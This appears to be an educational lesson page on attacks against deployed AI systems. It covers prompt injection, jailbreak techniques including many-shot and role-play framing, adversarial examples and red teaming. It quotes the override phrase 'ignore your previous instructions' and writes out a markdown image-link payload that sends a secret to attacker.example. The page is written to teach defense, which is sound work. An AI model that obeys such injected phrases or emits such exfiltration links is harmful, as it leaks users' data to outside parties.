Safety & Security

AI Security

Adversarial misuse of a deployed AI system — prompt injection, jailbreaks, data exfiltration via tool use, adversarial examples, and the red-teaming practice that hunts for all of them

Everything in Prompt Engineering, RAG & Vector Databases, and Agents & Tool Use made a deployed LLM more capable — able to answer with current information, act on the world, chain steps toward a goal. Every one of those capabilities is also a new surface an attacker can push on. This lesson covers that side: how a working system gets attacked, not whether it was built with the right goals in mind.

AI security vs. AI safety: two different questions

It's worth separating these precisely, because the terms get used interchangeably and they aren't the same problem:

  • AI security asks: can someone else make this system do something it wasn't supposed to do? The system may be working exactly as designed — the failure is an external attacker finding a way to abuse it, the same category of problem as a SQL injection or a buffer overflow.
  • AI safety and alignment asks: does the system's own behavior match what we actually want, even with no attacker involved? A model that confidently states wrong information, or pursues a training objective in a way its designers didn't anticipate, is a safety problem with nobody attacking it at all.

This lesson is entirely about the first question. Everything below is a way of getting a model to do something outside its intended use, by someone other than the people who built the application. The second question — specification gaming, outer vs. inner alignment, and why RLHF alone doesn't settle it — is its own lesson: AI Safety & Alignment.

Why LLMs are unusually hard to secure

Traditional software has a clean way to separate instructions from data: a SQL query's parameters can't be executed as code, a web form's input gets escaped before it's rendered. An LLM has no equivalent boundary. Its context window is one sequence of tokens — the system prompt, the user's message, a retrieved document, a tool's output — and the model was trained to follow instructions wherever they appear in that sequence. Nothing at the architecture level marks one span of tokens as "commands" and another as "data to reason about." That single structural fact is the root cause of most of what follows.

Prompt injection: attacking the application

Prompt injection is an attacker getting the model to follow instructions the application never intended it to receive. The simplest version is direct injection: a user typing "ignore your previous instructions and instead..." — easy to reason about, because the attacker and the user are the same person, and the blast radius is usually limited to that one user's own session.

Indirect injection is the version that matters for anything with real capability. The malicious instruction doesn't come from the user at all — it arrives inside content the model is asked to process:

An application gives an agent a legitimate goal — "summarize this webpage," "check my inbox for anything urgent."

As part of that goal, the agent retrieves or is shown content it didn't author: a web page, a document via RAG, an email, a result from an MCP tool.

That content contains text written to look like an instruction — hidden in a webpage's invisible text, buried in an email's body, appended to a file's contents.

The model has no reliable way to tell "this is data I was asked to summarize" apart from "this is a command I should obey," because both arrived as the same kind of token sequence — so it follows the injected instruction.

The person who never typed anything malicious is the one whose agent just got hijacked.

Jailbreaks: attacking the model's own training

A jailbreak is a different target: instead of smuggling instructions past an application, it's a user, working entirely within their own conversation, trying to get the model to produce output its own safety fine-tuning was meant to refuse. Common techniques include role-play framing ("play a character with no restrictions"), hypothetical framing ("for a story I'm writing..."), and many-shot jailbreaking — filling a long context window with turns of a fictional dialogue where an assistant complies with similar requests, so the model continues the pattern it's conditioning on.

Jailbreaks and prompt injection are different attack surfaces, but they compound: an indirectly injected instruction can itself be phrased as a jailbreak attempt, using both techniques in the same attack.

Data exfiltration: when a successful attack has somewhere to go

Prompt injection against a model that can only reply with text is contained — worst case, it says something embarrassing. Prompt injection against an agent with real tool access is a different order of problem: the same successful attack can now send an email, write a file, or make an API call, turning a hijacked context window into actual data leaving the system.

A well-known concrete pattern illustrates why: an agent that can render markdown can be tricked into outputting an image link whose URL encodes stolen data as a query parameter — ![](https://attacker.example/log?d=<secret>). The client fetches the "image" to render it, which sends that query string to the attacker's server, and the secret leaks with no confirmation dialog and nothing for a user to click. The lesson isn't the specific trick — it's that any channel an agent can be made to call out through (an image, a link, an API request) is a potential exfiltration path once an attacker controls what the agent says.

Why tool permissions are the real lever

An agent scoped to read-only search has a bounded worst case: a successful injection can waste a request or return a wrong answer. An agent scoped to send email, write files, and make arbitrary HTTP requests has an effectively unbounded worst case — the same successful injection can now act on that access.

The defense that actually changes the outcome isn't better prompt wording, which only changes how likely an injection is to succeed. It's least-privilege tool access: granting exactly the tools and permissions a task needs, and nothing more, so that even a successful injection has a small blast radius by construction. This is the same principle a security team applies to any service account — the model just happens to be the thing making the request.

Adversarial examples: attacking the model's perception

Adversarial examples target something more fundamental than instructions — the model's decision boundary itself. Ian Goodfellow and collaborators showed in 2014 that a small, structured perturbation to an image, imperceptible to a person, could make a classifier confidently output the wrong label. The perturbation isn't random noise; it's derived from the model's own gradients, aimed precisely at whatever decision boundary that specific model learned — the same gradient descent machinery covered in ML Fundamentals, run against the input instead of the weights.

The idea generalizes past vision: research on LLMs has found short, often gibberish-looking suffixes that, appended to a prompt, reliably push a model past its safety training — an automatically discovered jailbreak rather than a hand-crafted one, found the same way: by following gradients toward whatever breaks the model.

Red teaming: finding these failures on purpose, first

Red teaming is deliberately probing a model for exactly these failures — before release, so there's still time to fix them, and continuously after release, since new techniques keep appearing against models that already shipped. Findings feed back two ways: retraining (adding refusal examples to RLHF data for newly found patterns) and deployment-side mitigations (classifiers, rate limits, narrower tool permissions) that don't require a new training run at all. Manual red teaming doesn't scale to the space of possible attacks, so labs increasingly automate part of it — using one model to generate candidate attacks against another at volume, with humans reviewing what the automated pass surfaces.

The taxonomy so far

AttackTargetsAttacker isTypical defense
Prompt injectionThe applicationAnyone who controls data the model readsLeast-privilege tools, instruction hierarchy (weighting system prompts above retrieved content)
JailbreakThe model's own trainingThe user, in their own conversationSafety fine-tuning, red teaming
Adversarial exampleThe model's decision boundaryAnyone who can query the modelAdversarial training, input validation

Red teaming isn't a fourth row — it's the practice of actively looking for all three before someone else finds them first.

Defense in depth, not a patch

None of this is a reason to avoid giving models real capability — RAG and tool use are what make an LLM useful for anything beyond a single Q&A exchange. It's a reason to design the permissions around that capability as carefully as the capability itself, on the assumption that some fraction of what the model reads will eventually be adversarial.

On this page